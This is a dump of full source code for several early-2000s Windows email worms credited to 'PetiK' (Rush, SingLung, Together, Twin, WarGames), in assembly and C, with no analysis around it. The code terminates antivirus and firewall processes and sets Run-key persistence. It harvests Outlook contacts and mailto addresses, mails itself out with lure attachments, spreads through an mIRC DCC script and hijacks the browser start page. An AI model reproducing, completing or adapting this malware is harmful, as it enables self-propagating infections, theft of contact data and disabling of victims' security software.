test eax,eax
je F2
xchg eax,esi
push 0
push ebx
callx GetFileSize
cmp eax,3
jbe F3
scan_file:
xor edx,edx
mov edi,offset mail_addr
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,0dh
je entr1
cmp al,0ah
je entr2
cmp al,"#"
je f_mail
cmp al,"@"
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
entr1: xor al,al
stosb
pop edi
test edx,edx
je scan_file
call send_mail
jmp scan_file
entr2: xor al,al
stosb
pop edi
jmp scan_file
f_mail:
F3: push esi
callx UnmapViewOfFile
F2: push ebp
callx CloseHandle
F1: push ebx
callx CloseHandle
not_exist:
popad
scan_window:mov counter,0
win1: inc counter
cmp counter,1000000
je end_w
@pushsz "Norton AntiVirus"
push 00h
callx FindWindowA
test eax,eax
jz win2
jmp change_nav
win2: @pushsz "System Properties"
push 00h
callx FindWindowA
test eax,eax
jz win3
jmp show_window
win3: @pushsz "Microsoft Home Page - Microsoft Internet Explorer"
push 00h
callx FindWindowA
test eax,eax
jz win1
jmp display_message
change_nav:
mov edi,eax
@pushsz "Norton Virus : W32.Norton.Worm@mm"
push edi
callx SetWindowTextA
jmp win1
show_window:
mov edi,eax
push 2
push edi
callx ShowWindow
jmp win1
display_message:
mov edi,eax
push 10h
@pushsz "Microsoft Internet Explorer"
@pushsz "You don't have access to this page"
push 00h
callx MessageBoxA
push 0
push edi
callx ShowWindow
jmp win1
end_w: push 00h
callx ExitProcess
hide_worm:
pushad
@pushsz "Kernel32.dll"
callx GetModuleHandleA
xchg eax,ecx
jecxz end_hide_worm
@pushsz "RegisterServiceProcess"
push ecx
callx GetProcAddress
xchg eax,ecx
jecxz end_hide_worm
push 1
push 0
call ecx
end_hide_worm:
popad
ret
internet_page:
pushad
call diff_val
db "Search Page",0
db "Start Page",0
db "Local Page",0
diff_val:
pop esi
push 3
pop ecx
page_loop:
push ecx
push 32
@pushsz "http://www.petik.fr.fm"
push 1
push esi
@pushsz "Software\Microsoft\Internet Explorer\Main"
push 80000001h
callx SHSetValueA
@endsz
pop ecx
loop page_loop
popad
ret
send_mail:
xor eax,eax
push eax
push eax
push offset Message
push eax
push [MAPIHdl]
callx MAPISendMail
ret
.data
; === copy_worm ===
orig_worm db 50 dup (0)
copy_worm db 50 dup (0)
; === beep ===
counter dd ?
; === special_folder ===
personal db 70 dup (0)
octets dd ?
FileHdl dd ?
; === scan email ===
mailbook db 50 dup (0)
mail_addr db 128 dup (?)
MAPIHdl dd 0
name_mail db "ScanVir_25.exe",0
subject db "New Scan Virus...",0
body db "Hi man,",0dh,0ah
db "I send you the last update of ScanVir (v 2.5).",0dh,0ah
db "Look at the file attached.",0dh,0ah,0dh,0ah
db 09h,09h,09h,09h,"Bye and have a nice day.",0
namefrom db "Your Best Friend",0
Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach
MsgFrom dd ?
dd namefrom
dd ?
dd ?
dd ?
MsgTo dd ?
dd 1
dd offset mail_addr
dd offset mail_addr
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset orig_worm
dd offset name_mail
dd ?
txtd: db "Hi man,",0dh,0ah,0dh,0ah
db "I don't want to destroy your computer.",0dh,0ah
db "But other programs are more dangerous.",0dh,0ah,0dh,0ah,0dh,0ah
db 09h,09h,09h,"PetiK",00h
TXTSIZE equ $-txtd
vbsd: db 'On Error Resume Next',0dh,0ah
db 'Set rush=CreateObject("Outlook.Application")',0dh,0ah
db 'Set chan=rush.GetNameSpace("MAPI")',0dh,0ah
db 'Set fso=CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'Set txt=fso.CreateTextFile(fso.GetSpecialFolder(0)&"\MailBook.txt")',0dh,0ah
db 'txt.Close',0dh,0ah
db 'For Each M In chan.AddressLists',0dh,0ah
db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
db 'For O=1 To M.AddressEntries.Count',0dh,0ah
db 'Set P=M.AddressEntries(O)',0dh,0ah
db 'Set txt=fso.OpenTextFile(fso.GetSpecialFolder(0)&"\MailBook.txt",8,true)',0dh,0ah
db 'txt.WriteLine P.Address',0dh,0ah
db 'txt.Close',0dh,0ah
db 'Next',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'Set txt=fso.OpenTextFile(fso.GetSpecialFolder(0)&"\MailBook.txt",8,true)',0dh,0ah
db 'txt.WriteLine "#"',0dh,0ah
db 'txt.Close',0dh,0ah
VBSSIZE equ $-vbsd
signature db "I-Worm.Rush",00h
origine db "A worm made in France",00h
author db "Written by PetiK - 2001",00h
end start
end

340
Win32/I-Worm.SingLung.c Normal file

@ -0,0 +1,340 @@
/*
Name : I-Worm.SingLung
Author : PetiK
Date : January 23rd 2002 - January 26th 2002
Language : C++/Win32asm
Greetz to Bumblebee (I-Worm.Plage and I-Worm.Rundll);
*/
#include <stdio.h>
#include <windows.h>
#include <mapi.h>
#include <tlhelp32.h>
#pragma argused
#pragma inline
char filename[100],sysdir[100],sysdr[100],winhtm[100];
LPSTR Run="Software\\Microsoft\\Windows\\CurrentVersion\\Run",
SHFolder=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders";
int i;
HANDLE fd,lSnapshot,myproc;
BOOL rProcessFound;
BYTE desktop[50],favoris[50],personal[50],cache[50];
DWORD sizcache=sizeof(desktop),sizfavoris=sizeof(favoris),
sizpersonal=sizeof(personal),sizdesktop=sizeof(cache);
DWORD type=REG_SZ;
FILE *stopv;
LHANDLE session;
MapiMessage mess;
MapiRecipDesc from;
HINSTANCE hMAPI;
HKEY hReg;
PROCESSENTRY32 uProcess;
SYSTEMTIME systime;
WIN32_FIND_DATA ffile;
HDC dc;
void Welcome();
void StopAV(char *);
void FindFile(char *,char *);
void GetMail(char *,char *);
void sendmail(char *);
void FeedBack();
//ULONG (PASCAL FAR *RegSerPro)(ULONG, ULONG);
ULONG (PASCAL FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG);
int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
{
/*
// Worm in RegisterServiceProcess
HMODULE kern32=GetModuleHandle("KERNEL32.DLL");
if(kern32) {
(FARPROC &)RegSerPro=GetProcAddress(kern32,"RegisterServiceProcess");
if(RegSerPro)
RegSerPro(NULL,1);
} */
// Fuck some AntiVirus hahahaha
StopAV("AVP32.EXE"); // AVP
StopAV("AVPCC.EXE"); // AVP
StopAV("AVPM.EXE"); // AVP
StopAV("WFINDV32.EXE"); // Dr. Solomon
StopAV("F-AGNT95.EXE"); // F-Secure
StopAV("NAVAPW32.EXE"); // Norton Antivirus
StopAV("NAVW32.EXE"); // Norton Antivirus
StopAV("NMAIN.EXE"); // Norton Antivirus
StopAV("PAVSCHED.EXE"); // Panda AntiVirus
StopAV("ZONEALARM.EXE"); // ZoneAlarm
GetModuleFileName(hInst,filename,100);
GetSystemDirectory((char *)sysdir,100);
strcpy(sysdr,sysdir);
strcat(sysdr,"\\MSGDI32.EXE");
if((lstrcmp(filename,sysdr))!=0) {
Welcome();
}
else
{
hMAPI=LoadLibrary("MAPI32.DLL");
(FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail");
RegOpenKeyEx(HKEY_USERS,SHFolder,0,KEY_QUERY_VALUE,&hReg);
RegQueryValueEx(hReg,"Desktop",0,&type,desktop,&sizdesktop);
RegQueryValueEx(hReg,"Favorites",0,&type,favoris,&sizfavoris);
RegQueryValueEx(hReg,"Personal",0,&type,personal,&sizpersonal);
RegQueryValueEx(hReg,"Cache",0,&type,cache,&sizcache);
RegCloseKey(hReg);
GetWindowsDirectory((char *)winhtm,100);
_asm
{
call @wininet
db "WININET.DLL",0
@wininet:
call LoadLibrary
test eax,eax
jz end_asm
mov ebp,eax
call @inetconnect
db "InternetGetConnectedState",0
@inetconnect:
push ebp
call GetProcAddress
test eax,eax
jz end_wininet
mov edi,eax
verf:
push 0
push Tmp
call edi
dec eax
jnz verf
end_wininet:
push ebp
call FreeLibrary
end_asm:
jmp end_all_asm
Tmp dd 0
end_all_asm:
}
FindFile(desktop,"*.htm");
FindFile(favoris,"*.ht*");
FindFile(personal,"*.ht*");
FindFile(personal,"*.doc");
FindFile(winhtm,".ht*");
FindFile(cache,".ht*");
FreeLibrary(hMAPI);
FeedBack();
}
strcat(sysdir,"\\MsGDI32.exe");
CopyFile(filename,sysdir,FALSE);
RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_WRITE,&hReg);
RegSetValueEx(hReg,"Microsoft GDI 32 bits",0,REG_SZ,(BYTE *)sysdir,100);
RegCloseKey(hReg);
}
void Welcome()
{
register char fileWel[100],messWel[25],titWel[25];
strcpy(fileWel,filename);
fileWel[0]=0;
for(i=strlen(filename);i>0 && filename[i]!='\\';i--);
wsprintf(titWel,"Error - %s",fileWel+i+1);
wsprintf(messWel,"File - %s - damaged.\nCannot open this file.",fileWel+i+1);
MessageBox(NULL,messWel,titWel,MB_OK|MB_ICONHAND);
}
void StopAV(char *antivirus)
{
register BOOL term;
lSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
uProcess.dwSize=sizeof(uProcess);
rProcessFound=Process32First(lSnapshot,&uProcess);
while(rProcessFound) {
if(strstr(uProcess.szExeFile,antivirus)!=NULL) { // Norton Antivirus
myproc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,uProcess.th32ProcessID);
if(myproc!=NULL) {
term=TerminateProcess(myproc,0);
}
CloseHandle(myproc);
}
rProcessFound=Process32Next(lSnapshot,&uProcess);
}
CloseHandle(lSnapshot);
}
void FindFile(char *folder, char *ext)
{
register bool abc=TRUE;
register HANDLE hFile;
char mail[128];
SetCurrentDirectory(folder);
hFile=FindFirstFile(ext,&ffile);
if(hFile!=INVALID_HANDLE_VALUE) {
while(abc) {
SetFileAttributes(ffile.cFileName,FILE_ATTRIBUTE_ARCHIVE);
GetMail(ffile.cFileName,mail);
if(strlen(mail)>0) {
WritePrivateProfileString("EMail found",mail,"send","singlung.txt");
sendmail(mail);
}
abc=FindNextFile(hFile,&ffile);
}
}
}
void GetMail(char *namefile, char *mail)
{
HANDLE hf,hf2;
char *mapped;
DWORD size,i,k;
BOOL test=FALSE,valid=FALSE;
mail[0]=0;
hf=CreateFile(namefile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,0);
if(hf==INVALID_HANDLE_VALUE)
return;
size=GetFileSize(hf,NULL);
if(!size)
return;
if(size<8)
return;
size-=100;
hf2=CreateFileMapping(hf,0,PAGE_READONLY,0,0,0);
if(!hf2) {
CloseHandle(hf);
return;
}
mapped=(char *)MapViewOfFile(hf2,FILE_MAP_READ,0,0,0);
if(!mapped) {
CloseHandle(hf2);
CloseHandle(hf);
return;
}
i=0;
while(i<size && !test) {
if(!strncmpi("mailto:",mapped+i,strlen("mailto:"))) {
test=TRUE;
i+=strlen("mailto:");
k=0;
while(mapped[i]!=34 && mapped[i]!=39 && i<size && k<127) {
if(mapped[i]!=' ') {
mail[k]=mapped[i];
k++;
if(mapped[i]=='@')
valid=TRUE;
}
i++;
}
mail[k]=0;
} else
i++;
}
if(!valid)
mail[0]=0;
UnmapViewOfFile(mapped);
CloseHandle(hf2);
CloseHandle(hf);
return;
}
void sendmail(char *tos)
{
memset(&mess,0,sizeof(MapiMessage));
memset(&from,0,sizeof(MapiRecipDesc));
from.lpszName=NULL;
from.ulRecipClass=MAPI_ORIG;
mess.lpszSubject="Secret for you...";
mess.lpszNoteText="Hi Friend,\n\n"
"I send you my last work.\n"
"Mail me if you have some suggests.\n\n"
" See you soon. Best Regards.";
mess.lpRecips=(MapiRecipDesc *)malloc(sizeof(MapiRecipDesc));
if(!mess.lpRecips)
return;
memset(mess.lpRecips,0,sizeof(MapiRecipDesc));
mess.lpRecips->lpszName=tos;
mess.lpRecips->lpszAddress=tos;
mess.lpRecips->ulRecipClass=MAPI_TO;
mess.nRecipCount=1;
mess.lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
if(!mess.lpFiles)
return;
memset(mess.lpFiles,0,sizeof(MapiFileDesc));
mess.lpFiles->lpszPathName=filename;
mess.lpFiles->lpszFileName="My_Work.exe";
mess.nFileCount=1;
mess.lpOriginator=&from;
mSendMail(0,0,&mess,0,0);
free(mess.lpRecips);
free(mess.lpFiles);
}
void FeedBack()
{
GetSystemTime(&systime);
switch(systime.wDay) {
case 7:
MessageBox(NULL,"It is not with a B-52 that you will stop terrorist groups.\n"
"With this, you stop the life of women and children.",
"Message to USA",MB_OK|MB_ICONHAND);
break;
case 11:
dc=GetDC(NULL);
if(dc)
{
TextOut(dc,300,300,"Can we try to stop the conflicts ? YES OF COURSE !",50);
}
ReleaseDC(NULL,dc);
break;
case 28:
stopv=fopen("StopIntifada.htm","w");
fprintf(stopv,"<html><head><title>Stop Violence between Palestinians and Israeli</title></head>\n");
fprintf(stopv,"<body bgcolor=blue text=yellow>\n");
fprintf(stopv,"<p align=\"center\"><font size=\"5\">HOW TO STOP THE VIOLENCE</font></p><BR>\n");
fprintf(stopv,"<p align=\"left\"><font size=\"3\">-THE ISRAELIS:</font><BR>\n");
fprintf(stopv,"<font>To take the israelis tank out of the palestinians autonomous city.</font><BR>\n");
fprintf(stopv,"<font>Don't bomb civil place after a terrorist bomb attack.</font><BR>\n");
fprintf(stopv,"<font>To arrest and to kill the leaders of terrorist groups.</font><BR><BR>\n");
fprintf(stopv,"<font>-THE PALESTINIANS:</font><BR>\n");
fprintf(stopv,"<font>To stop to provoke the israelis army.</font><BR>\n");
fprintf(stopv,"<font>To stop the terrorist attacks.</font><BR><BR>\n");
fprintf(stopv,"<font>-THE BOTH:</font><BR>\n");
fprintf(stopv,"<font>To try to accept the other people.</font><BR>\n");
fprintf(stopv,"<font>TO ORGANIZE A MEETING BETWEEN ARIEL SHARON AND YASSER ARAFAT !</font><BR><BR>\n");
fprintf(stopv,"<font>Thanx to read this.</font></p>\n");
fprintf(stopv,"</body></html>");
fclose(stopv);
ShellExecute(NULL,"open","StopIntifada.htm",NULL,NULL,SW_SHOWMAXIMIZED);
break;
}
}

514
Win32/I-Worm.Together.asm Normal file

@ -0,0 +1,514 @@
comment #
Name : I-Worm.Together
Author : PetiK
Date : March 10th 2002 - March 15th 2002
#
.586p
.model flat
.code
JUMPS
api macro a
extrn a:proc
call a
endm
PROCESSENTRY32 STRUCT
dwSize DWORD ?
cntUsage DWORD ?
th32ProcessID DWORD ?
th32DefaultHeapID DWORD ?
th32ModuleID DWORD ?
cntThreads DWORD ?
th32ParentProcessID DWORD ?
pcPriClassBase DWORD ?
dwFlags DWORD ?
szExeFile db 260 dup(?)
PROCESSENTRY32 ENDS
include Useful.inc
start_worm: call hide_worm
twin_worm:
push 50
mov esi,offset orig_worm
push esi
push 0
api GetModuleFileNameA ; esi = name of file
push 50
push offset verif_worm
api GetSystemDirectoryA
@pushsz "\EBASE64.EXE"
push offset verif_worm
api lstrcat
mov edi,offset copy_worm
push edi
push 50
push edi
api GetSystemDirectoryA
add edi,eax
mov eax,"aBe\"
stosd
mov eax,"46es"
stosd
mov eax,"exe."
stosd
pop edi ; edi = %system%\eBase64.exe
push offset orig_worm
push offset verif_worm
api lstrcmp
test eax,eax
jz continue_worm
push 0
push edi
push esi
api CopyFileA ; copy file
push 20
push edi
push 1
@pushsz "Encode Base64"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
api SHSetValueA ; regedit
jmp end_worm
continue_worm:
fuck_antivirus:
@pushsz "OIFIL400.DLL"
api LoadLibraryA
test eax,eax
jz end_fuck_antivirus
push 0
push 2
api CreateToolhelp32Snapshot
mov lSnapshot, eax
inc eax
jz end_fuck_antivirus
lea eax,uProcess
mov [eax.dwSize], SIZE PROCESSENTRY32
lea eax,uProcess
push eax
push lSnapshot
api Process32First
checkfile:
test eax, eax
jz InfExpRetCl
push ecx
mov eax,ProcessID
push offset uProcess
cmp eax,[uProcess.th32ProcessID]
je NextFile
lea ebx,[uProcess.szExeFile]
verif macro verifname,empty
local name
ifnb <empty>
%out too much arguments in macro 'nxt_instr'
.err
endif
call name
db verifname,0
name:
push ebx
api lstrstr
test eax,eax
endm
verif "ARG" ; Norton
jnz term
verif "AVP32.EXE" ; AVP
jnz term
verif "AVPCC.EXE" ; AVP
jnz term
verif "AVPM.EXE" ; AVP
jnz term
verif "WFINDV32.EXE"
jnz term
verif "F-AGNT95.EXE" ; F-SECURE
jnz term
verif "NAVAPW32.EXE" ; Norton
jnz term
verif "NAVW32.EXE" ; Norton
jnz term
verif "NMAIN.EXE"
jnz term
verif "PAVSHED.EXE" ; PandaSoftware
jnz term
verif "vshwin32.exe" ; McAfee
jnz term
verif "PETIKSHOW.EXE" ; McAfee
jnz term
@pushsz "ZONEALARM.EXE"
push ebx
api lstrstr
test eax,eax
jz NextFile
term: push [uProcess.th32ProcessID]
push 1
push 001F0FFFh
api OpenProcess
test eax,eax
jz NextFile
push 0
push eax
api TerminateProcess
push ebx
push offset new_name
api lstrcpy
mov esi,offset new_name
push esi
api lstrlen
add esi,eax
sub esi,4
mov [esi],"ktp."
lodsd
; mov [esi],"kmz."
; lodsd
push 0
push offset new_name
push ebx
api CopyFileA
push ebx
api DeleteFileA
NextFile:
push offset uProcess
push lSnapshot
api Process32Next
jmp checkfile
InfExpRetCl:
push lSnapshot
api CloseHandle
end_fuck_antivirus:
call Spread_Mirc
call Spread_Worm
e_s_w:
end_worm:
push 0
api ExitProcess
hide_worm Proc
pushad
@pushsz "KERNEL32.DLL"
api GetModuleHandleA
xchg eax,ecx
jecxz end_hide_worm
@pushsz "RegisterServiceProcess" ; Registered as Service Process
push ecx
api GetProcAddress
xchg eax,ecx
jecxz end_hide_worm
push 1
push 0
call ecx
end_hide_worm:
popad
ret
hide_worm EndP
Spread_Mirc Proc
push offset copy_worm
push offset mirc_exe
api lstrcpy
call @mirc
db "C:\mirc\script.ini",0
db "C:\mirc32\script.ini",0 ; spread with mIRC. Thanx to Microsoft.
db "C:\progra~1\mirc\script.ini",0
db "C:\progra~1\mirc32\script.ini",0
@mirc:
pop esi
push 4
pop ecx
mirc_loop:
push ecx
push 0
push 80h
push 2
push 0
push 1
push 40000000h
push esi
api CreateFileA
mov ebp,eax
push 0
push offset byte_write
@tmp_mirc:
push e_mirc - s_mirc
push offset s_mirc
push ebp
api WriteFile
push ebp
api CloseHandle
@endsz
pop ecx
loop mirc_loop
end_spread_mirc:
ret
Spread_Mirc EndP
Spread_Worm Proc
pushad
push 50
push offset vbs_worm
api GetSystemDirectoryA
@pushsz "\eBase.vbs"
push offset vbs_worm
api lstrcat
push 0
push 20h
push 2
push 0
push 1
push 40000000h
push offset vbs_worm
api CreateFileA
mov ebp,eax
push 0
push offset byte_write
push e_vbs - s_vbs
push offset s_vbs
push ebp
api WriteFile
push ebp
api CloseHandle
push 1
push 0
push 0
push offset vbs_worm
@pushsz "open"
push 0
api ShellExecuteA
verif_inet:
push 0
push offset inet
api InternetGetConnectedState
dec eax
jnz verif_inet
push 50
push offset t_ini
api GetSystemDirectoryA
@pushsz "\together.ini"
push offset t_ini
api lstrcat
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
push offset t_ini
api CreateFileA
inc eax
je end_spread_worm
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 2
push eax
push ebx
api CreateFileMappingA
test eax,eax
je end_s1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 4
push ebp
api MapViewOfFile
test eax,eax
je end_s2
xchg eax,esi
push 0
push ebx
api GetFileSize
cmp eax,4
jbe end_s3
scan_mail:
xor edx,edx
mov edi,offset mail_addr
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,";"
je end_m
cmp al,"#"
je f_mail
cmp al,'@'
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
end_m: xor al,al
stosb
pop edi
test edx,edx
je scan_mail
call send_mail
jmp scan_mail
f_mail:
end_s3: push esi
api UnmapViewOfFile
end_s2: push ebp
api CloseHandle
end_s1: push ebx
api CloseHandle
end_spread_worm:
popad
jmp e_s_w
Spread_Worm EndP
send_mail:
xor eax,eax
push eax
push eax
push offset Message
push eax
push [sess]
api MAPISendMail
ret
.data
; === Copy Worm ===
orig_worm db 50 dup (0)
copy_worm db 50 dup (0)
verif_worm db 50 dup (0)
sysTime db 16 dup(0)
; === Fuck AntiVirus ===
uProcess PROCESSENTRY32 <?>
ProcessID dd ?
lSnapshot dd ?
new_name db 100 dup (?)
; === Spread With mIrc ===
s_mirc: db "[script]",CRLF
db ";Don't edit this file.",CRLF,CRLF
db "n0=on 1:JOIN:{",CRLF
db "n1= /if ( $nick == $me ) { halt }",CRLF
db "n2= /.dcc send $nick "
mirc_exe db 50 dup (?)
db CRLF,"n3=}",0
e_mirc:
byte_write dd ?
; === Spread with Outlook ===
vbs_worm db 50 dup (0)
t_ini db 50 dup (0)
mail_addr db 128 dup (?)
inet dd 0
sess dd 0
subject db "Re: Answer",0
body db "Here for you...",0
filename db "funny_game.exe",0
Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach
MsgFrom dd ?
dd ?
dd ?
dd ?
dd ?
dd ?
MsgTo dd ?
dd 1
dd offset mail_addr
dd offset mail_addr
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset orig_worm
dd offset filename
dd ?
s_vbs:
db 'On Error Resume Next',CRLF
db 'Set fs=CreateObject("Scripting.FileSystemObject")',CRLF
db 'Set sys=fs.GetSpecialFolder(1)',CRLF
db 'Set c=fs.CreateTextFile(sys&"\together.ini")',CRLF
db 'c.Close',CRLF
db 'Set ou=CreateObject("Outlook.Application")',CRLF
db 'Set map=ou.GetNameSpace("MAPI")',CRLF
db 'adr=""',CRLF
db 'For Each mel in map.AddressLists',CRLF
db 'If mel.AddressEntries.Count <> 0 Then',CRLF
db 'For O=1 To mel.AddressEntries.Count',CRLF
db 'adr=adr &";"& mel.AddressEntries(O).Address',CRLF
db 'Next',CRLF
db 'End If',CRLF
db 'Next',CRLF
db 'adr=adr &";#"',CRLF,CRLF
db 'Set c=fs.OpenTextFile(sys&"\together.ini",2)',CRLF
db 'c.WriteLine adr',CRLF
db 'c.Close',CRLF
e_vbs:
signature db "I-Worm.Together "
author db "Coded by PetiK - 2002",00h
end start_worm
end

198
Win32/I-Worm.Twin.asm Normal file

@ -0,0 +1,198 @@
comment #
Name : I-Worm.Twin
Author : PetiK
Date : January 30th 2002 - February 1st 2002
Size : 6656 bytes
Action : See yourself. It's not complex.
#
.586p
.model flat
.code
JUMPS
api macro a
extrn a:proc
call a
endm
include useful.inc
include myinclude.inc
start: push 50
mov esi,offset orig_worm
push esi
push 0
api GetModuleFileNameA
push 25
push esi
push 1
@pushsz "AntiVirus Freeware"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
api SHSetValueA
@pushsz "C:\twin.vbs"
api DeleteFileA
push 50
push offset pathname
api GetWindowsDirectoryA
@pushsz "\NetInfo.doc"
push offset pathname
api lstrcat
verif_inet:
push 0
push offset inet
api InternetGetConnectedState
dec eax
jnz verif_inet
push 0
push 0
push 3
push 0
push 1
push 80000000h
@pushsz "C:\backup.win"
api CreateFileA
inc eax
je end_worm
dec eax
xchg ebx,eax
push 0
push 0
push 0
push 2
push 0
push ebx
api CreateFileMappingA
test eax,eax
je end_w1
xchg eax,ebp
push 0
push 0
push 0
push 4
push ebp
api MapViewOfFile
test eax,eax
je end_w2
xchg eax,esi
push 0
push ebx
api GetFileSize
cmp eax,3
jbe end_w3
scan_mail:
xor edx,edx
mov edi,offset mail_addr
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,0dh
je entr1
cmp al,0ah
je entr2
cmp al,"#"
je f_mail
cmp al,'@'
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
entr1: xor al,al
stosb
pop edi
test edx,edx
je scan_mail
call send_mail
jmp scan_mail
entr2: xor al,al
stosb
pop edi
jmp scan_mail
f_mail:
end_w3: push esi
api UnmapViewOfFile
end_w2: push ebp
api CloseHandle
end_w1: push ebx
api CloseHandle
end_worm:
push 0
api ExitProcess
send_mail:
xor eax,eax
push eax
push eax
push offset Message
push eax
push [sess]
api MAPISendMail
ret
.data
orig_worm db 50 dup (0)
pathname db 50 dup (0)
mail_addr db 128 dup (?)
inet dd 0
sess dd 0
subject db "A comical story for you.",0
body db "I send you a comical story found on the Net.",0dh,0ah,0dh,0ah
db 9,"Best Regards. You friend.",0
filename db "comical_story.doc",0
Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach
MsgFrom dd ?
dd ?
dd ?
dd ?
dd ?
dd ?
MsgTo dd ?
dd 1
dd offset mail_addr
dd offset mail_addr
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset pathname
dd offset filename
dd ?
end start
end

379
Win32/I-Worm.WarGames.c Normal file

@ -0,0 +1,379 @@
/*
Name : I-Worm.WarGames
Author : PetiK
Date : February 12th 2002 - February 22th 2002
Language : C++/Win32asm
*/
#include <stdio.h>
#include <windows.h>
#include <mapi.h>
#include <tlhelp32.h>
#pragma argused
#pragma inline
char filename[100],sysdir[100],copyr[50]="w",winhtm[100],subj[50];
int num,counter=0;
char *alph[]={"a","b","c","d","e","f","g","h","i","j","k","l","m",
"n","o","p","q","r","s","t","u","v","w","x","y","z"};
char dn[20]="Wargames Uninstall",ust[40]="rundll32 mouse,disable";
LPSTR SHFolder=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders";
BYTE desktop[50],favoris[50],personal[50],cache[50],page[150];
DWORD sizcache=sizeof(desktop),sizfavoris=sizeof(favoris),
sizpersonal=sizeof(personal),sizdesktop=sizeof(cache),spage=sizeof(page);
DWORD type=REG_SZ;
FILE *vbsworm,*winstart;
HANDLE lSnapshot,myproc;
BOOL rProcessFound;
LHANDLE session;
MapiMessage mess;
MapiMessage *mes;
MapiRecipDesc from;
char messId[512],mname[50],maddr[30];
HINSTANCE hMAPI;
WIN32_FIND_DATA ffile;
PROCESSENTRY32 uProcess;
HKEY hReg;
SYSTEMTIME wartime;
void StopAV(char *);
void FindFile(char *,char *);
void GetMail(char *,char *);
void sendmail(char *);
ULONG (PASCAL FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG);
ULONG (PASCAL FAR *mLogoff)(LHANDLE, ULONG, FLAGS, ULONG);
ULONG (PASCAL FAR *mLogon)(ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPLHANDLE);
ULONG (PASCAL FAR *mFindNext)(LHANDLE, ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPTSTR);
ULONG (PASCAL FAR *mReadMail)(LHANDLE, ULONG, LPTSTR, FLAGS, ULONG, lpMapiMessage FAR *);
ULONG (PASCAL FAR *mFreeBuffer)(LPVOID);
int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
{
// Kill Some AntiVirus
StopAV("AVP32.EXE"); // AVP
StopAV("AVPCC.EXE"); // AVP
StopAV("AVPM.EXE"); // AVP
StopAV("WFINDV32.EXE"); // Dr. Solomon
StopAV("F-AGNT95.EXE"); // F-Secure
StopAV("NAVAPW32.EXE"); // Norton Antivirus
StopAV("NAVW32.EXE"); // Norton Antivirus
StopAV("NMAIN.EXE"); // Norton Antivirus
StopAV("PAVSCHED.EXE"); // Panda AntiVirus
StopAV("ZONEALARM.EXE"); // ZoneAlarm
// Kill Some Worm
StopAV("KERN32.EXE"); // I-Worm.Badtrans
StopAV("SETUP.EXE"); // I-Worm.Cholera
StopAV("RUNDLLW32.EXE"); // I-Worm.Gift
StopAV("GONER.SCR"); // I-Worm.Goner
StopAV("LOAD.EXE"); // I-Worm.Nimda
StopAV("INETD.EXE"); // I-Worm.Plage - BadTrans
StopAV("FILES32.VXD"); // I-Worm.PrettyPark
StopAV("SCAM32.EXE"); // I-Worm.Sircam
StopAV("GDI32.EXE"); // I-Worm.Sonic
StopAV("_SETUP.EXE"); // I-Worm.ZippedFiles
StopAV("EXPLORE.EXE"); // I-Worm.ZippedFiles
StopAV("ZIPPED_FILES.EXE"); // I-Worm.ZippedFiles
GetModuleFileName(hInst,filename,100);
GetSystemDirectory((char *)sysdir,100);
SetCurrentDirectory(sysdir);
CopyFile(filename,"article.doc.exe",TRUE);
RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WarGames Worm",&hReg);
RegSetValueEx(hReg,"DisplayName",0,REG_SZ,(BYTE *)dn,20);
RegSetValueEx(hReg,"UninstallString",0,REG_SZ,(BYTE *)ust,40);
RegCloseKey(hReg);
randomize();
num=rand() % 10;
randname:
strcat(copyr,alph[GetTickCount()%25]);
if(++counter==num) {
strcat(copyr,".exe");
MessageBox(NULL,copyr,"New Copy Name:",MB_OK|MB_ICONINFORMATION);
CopyFile(filename,copyr,FALSE);
WriteProfileString("WINDOWS","RUN",copyr);
WritePrivateProfileString("rename","NUL",filename,"WININIT.INI");
goto endrandname;
}
Sleep(GetTickCount()%100);
goto randname;
endrandname:
hMAPI=LoadLibrary("MAPI32.DLL");
(FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail");
RegOpenKeyEx(HKEY_USERS,SHFolder,0,KEY_QUERY_VALUE,&hReg);
